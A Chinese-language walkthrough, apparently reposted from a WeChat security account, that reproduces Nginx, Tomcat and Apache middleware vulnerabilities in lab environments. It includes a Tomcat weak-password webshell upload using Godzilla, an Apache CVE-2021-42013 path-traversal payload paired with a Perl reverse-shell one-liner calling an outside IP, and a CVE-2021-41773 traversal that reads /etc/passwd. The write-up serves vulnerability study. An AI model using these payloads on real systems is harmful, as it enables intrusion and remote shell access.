中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

admin 2024年4月7日10:53:26评论12 views字数 1309阅读4分21秒阅读模式

服务攻防测试流程:

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

案例演示:Nginx 解析漏洞复现

该漏洞与Nginxphp版本无关,属于用户配置不当造成的解析漏洞

使用vulhub靶场复现

启动环境,访问地址,发现是一个文件上传功能

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

上传一个带有脚本代码的图片

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

上传成功,访问图片地址,

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

脚本代码没有被解析

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

在图片地址后面加上"/.php"图片就可以被当作脚本文件解析执行

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

案例演示:中间件Tomcat7+ 弱密码和后端 Getshell 漏洞

漏洞产生:配置不当导致后台弱口令,可通过上传jsp压缩包改名的war拿shell

工具哥斯拉:https://github.com/BeichenDream/Godzilla

使用vulhub靶场,启动环境

打开网站,点击Manager APP登录tomcat后台,猜测弱口令为:用户名 tomcat密码tomcat

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

成功进入后台

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

使用工具哥斯拉生成jsp文件

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

将生成的jsp文件压缩,然后将压缩文件后缀更改为war

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

来到tomcat后台的war上传功能,上传2.war文件

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

上传成功之后会在tomcat后台生成一个以上传的压缩文件名来命名的目录

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

点击访问这个目录,在后面加上我们的jsp文件名就是后门连接路径

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

来到哥斯拉点击目标——添加填写后门地址等信息

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

点击测试链接,如果测试成功就点击添加。对添加的目标右键——进入

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

进入命令执行终端,成功获取shell

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

来到文件管理模块还可以看到我们的脚本文件

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

案例演示:apache 远程代码执行 (CVE-2021-42013

影响版本:Apache 2.4.49 Apache 2.4.50

打开vulfocus靶场,启动漏洞环境,打开漏洞地址

抓取post数据包

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

服务器监听5566端口

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

更改数据包,

将访问路径更改为:/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

将传递参数更改为:

echo;perl-e 'use Socket;$i="43.134.241.193";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

放包,服务器成功获取shell

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

案例演示:Apache路径穿越漏洞(CVE-2021-41773)

影响版本:Apache 2.4.49 Apache 2.4.50

打开vulfocus靶场,启动漏洞环境,打开漏洞地址

查看页面元素可知服务版本为Apache/2.4.50 (Unix),说明大概率存在漏洞

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

抓取漏洞地址数据包

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

将访问路径更改为:/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd因为是Unix系统,所以敏感信息在/etc/passwd下,放包成功获取数据

中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

原文始发于微信公众号(小黑子安全):中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月7日10:53:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   中间件安全-CVE漏洞复现+Apache+Tomcat+Nginxhttp://cn-sec.com/archives/2634368.html

发表评论

匿名网友 填写信息